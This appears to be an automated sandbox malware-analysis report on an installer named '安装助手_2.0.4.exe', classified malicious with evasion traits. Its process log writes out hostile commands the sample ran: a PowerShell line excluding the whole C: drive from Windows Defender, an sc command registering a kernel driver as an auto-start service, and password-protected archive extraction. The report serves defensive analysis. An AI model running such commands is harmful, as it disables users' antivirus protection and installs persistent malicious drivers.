Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004090000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.dr | String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004090000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004090000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.dr | String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004090000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.dr | String found in binary or memory: http://ocsp.digicert.com0A
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004090000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.dr | String found in binary or memory: http://ocsp.digicert.com0C
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004090000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.dr | String found in binary or memory: http://ocsp.digicert.com0H
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004090000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.dr | String found in binary or memory: http://ocsp.digicert.com0I
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004090000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.dr | String found in binary or memory: http://ocsp.digicert.com0X
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004090000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.dr | String found in binary or memory: http://www.digicert.com/CPS0
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004090000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.dr | String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004539000.00000004.00001000.00020000.00000000.sdmp, is-9PU3N.tmp.5.dr | String found in binary or memory: http://www.metalinker.org/
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004539000.00000004.00001000.00020000.00000000.sdmp, is-9PU3N.tmp.5.dr | String found in binary or memory: http://www.metalinker.org/basic_string::_M_construct
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004539000.00000004.00001000.00020000.00000000.sdmp, is-9PU3N.tmp.5.dr | String found in binary or memory: https://aria2.github.io/
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004539000.00000004.00001000.00020000.00000000.sdmp, is-9PU3N.tmp.5.dr | String found in binary or memory: https://aria2.github.io/Usage:
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004539000.00000004.00001000.00020000.00000000.sdmp, is-9PU3N.tmp.5.dr | String found in binary or memory: https://github.com/aria2/aria2/issues
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004539000.00000004.00001000.00020000.00000000.sdmp, is-9PU3N.tmp.5.dr | String found in binary or memory: https://github.com/aria2/aria2/issuesReport
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exe | String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exe, 00000000.00000003.1675967840.000000007F4AB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.exe, 00000000.00000003.1675593698.0000000002980000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000000.1677364257.0000000000A51000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000005.00000000.1700682526.000000000028D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.0.dr, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.4.dr | String found in binary or memory: https://www.innosetup.com/
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exe, 00000000.00000003.1675967840.000000007F4AB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.exe, 00000000.00000003.1675593698.0000000002980000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000000.1677364257.0000000000A51000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000005.00000000.1700682526.000000000028D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.0.dr, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.4.dr | String found in binary or memory: https://www.remobjects.com/ps

Operating System Destruction

Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp Process information set: 01 00 00 00

System Summary

Source: update.vac.1.dr Static PE information: section name: .=~
Source: hrsw.vbc.5.dr Static PE information: section name: .=~
Source: update.vac.5.dr Static PE information: section name: .=~
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp Code function: 5_2_6C633886 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp Code function: 5_2_6C7B5120 NtSetInformationThread,OpenSCManagerA,CloseServiceHandle,OpenServiceA,CloseServiceHandle
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp Code function: 5_2_6C633C62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp Code function: 5_2_6C633D62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp Code function: 5_2_6C7B5D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp Code function: 5_2_6C633D18 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp Code function: 5_2_6C6339CF NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp Code function: 5_2_6C633A6A NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp Code function: 5_2_6C631950 CreateFileA,DeviceIoControl,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp Code function: 5_2_6C634754 _strlen,CreateFileA,CreateFileA,CloseHandle,_strlen,std::ios_base::_Ios_base_dtor,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,TerminateProcess,GetCurrentProcess,TerminateProcess,_strlen,Sleep,ExitWindowsEx,Sleep,DeleteFileA,Sleep,_strlen,DeleteFileA,Sleep,_strlen,std::ios_base::_Ios_base_dtor
Source: C:\Program Files (x86)\Windows NT\7zr.exe Process token adjusted: Security
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp Code function: String function: 6C886F10 appears 415 times
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp Code function: String function: 6C7E9240 appears 31 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: String function: 00D0FB10 appears 720 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: String function: 00C71E40 appears 83 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: String function: 00C728E3 appears 34 times
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.4.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exe Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.0.dr Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.4.dr Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exe, 00000000.00000003.1675967840.000000007F7AA000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.4.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exe, 00000000.00000003.1675593698.0000000002A9E000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.4.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exe, 00000000.00000000.1673638280.00000000004E9000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.4.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exe Binary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.4.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tProtect.dll.11.dr Binary string: \Device\TfSysMon
Source: tProtect.dll.11.dr Binary string: \Device\TfKbMonPWLCache
Source: classification engine Classification label: mal96.evad.winEXE@147/32@0/0
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp Code function: 5_2_6C7B5D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 9_2_00C79313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 9_2_00C83D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 9_2_00C79252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp Code function: 5_2_6C7B5240 CreateToolhelp32Snapshot,CloseHandle,Process32NextW,Process32FirstW
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp File created: C:\Program Files (x86)\Windows NT\is-7402T.tmp
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7840:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:2316:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7324:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7540:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7812:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7020:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:8024:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7624:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7732:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7780:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:8124:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7628:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:1420:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7368:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:2180:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:8032:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7592:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7776:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7016:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7712:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7660:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:8168:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7576:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:8100:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:8164:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7304:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7180:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7616:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7944:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:3616:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7848:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:6944:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7384:120:WilError_03
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe File created: C:\Users\user\AppData\Local\Temp\is-940M1.tmp
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004539000.00000004.00001000.00020000.00000000.sdmp, is-9PU3N.tmp.5.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004539000.00000004.00001000.00020000.00000000.sdmp, is-9PU3N.tmp.5.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004539000.00000004.00001000.00020000.00000000.sdmp, is-9PU3N.tmp.5.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004539000.00000004.00001000.00020000.00000000.sdmp, is-9PU3N.tmp.5.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004539000.00000004.00001000.00020000.00000000.sdmp, is-9PU3N.tmp.5.dr Binary or memory string: SELECT data FROM %Q.'%q_node' WHERE nodeno=?Node %lld missing from databaseNode %lld is too small (%d bytes)Rtree depth out of range (%d)Node %lld is too small for cell count of %d (%d bytes)Dimension %d of cell %d on node %lld is corruptDimension %d of cell %d on node %lld is corrupt relative to parentwrong number of arguments to function rtreecheck()SELECT * FROM %Q.'%q_rowid'Schema corrupt or not an rtree_rowid_parentENDSELECT count(*) FROM %Q.'%q_%s'cannot open value of type %sno such rowid: %lldforeign keyindexedcannot open virtual table: %scannot open table without rowid: %scannot open view: %sno such column: "%s"cannot open %s column for writingblockDELETE FROM %Q.'%q_data';DELETE FROM %Q.'%q_idx';DELETE FROM %Q.'%q_docsize';version%s_nodedata_shape does not contain a valid polygon
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004539000.00000004.00001000.00020000.00000000.sdmp, is-9PU3N.tmp.5.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004539000.00000004.00001000.00020000.00000000.sdmp, is-9PU3N.tmp.5.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004539000.00000004.00001000.00020000.00000000.sdmp, is-9PU3N.tmp.5.dr Binary or memory string: SELECT %s WHERE rowid = ?SELECT rowid, rank FROM %Q.%Q ORDER BY %s("%w"%s%s) %sinvalid rootpageorphan indexsqlite_stat%dDELETE FROM %Q.%s WHERE %s=%QDELETE FROM %Q.sqlite_master WHERE name=%Q AND type='trigger'corrupt schemaUPDATE %Q.sqlite_master SET rootpage=%d WHERE #%d AND rootpage=#%dstattable %s may not be droppeduse DROP TABLE to delete table %suse DROP VIEW to delete view %stblDELETE FROM %Q.sqlite_sequence WHERE name=%QDELETE FROM %Q.sqlite_master WHERE tbl_name=%Q and type!='trigger' UNIQUEindexcannot create a TEMP index on non-TEMP table "%s"table %s may not be indexedviews may not be indexedvirtual tables may not be indexedthere is already a table named %sindex %s already existssqlite_autoindex_%s_%dexpressions prohibited in PRIMARY KEY and UNIQUE constraintsconflicting ON CONFLICT clauses specifiedCREATE%s INDEX %.*sINSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);name='%q' AND type='index'table "%s" has more than one primary keyAUTOINCREMENT is only allowed on an INTEGER PRIMARY KEYTABLEVIEW
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004539000.00000004.00001000.00020000.00000000.sdmp, is-9PU3N.tmp.5.dr Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exe Virustotal: Detection: 9%
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exe String found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe File read: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe
Source: unknown Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe Process created: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp "C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp" /SL5="$2044E,4753025,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe"
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe Process created: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp "C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp" /SL5="$6047A,4753025,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" /VERYSILENT
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Program Files (x86)\Windows NT\7zr.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
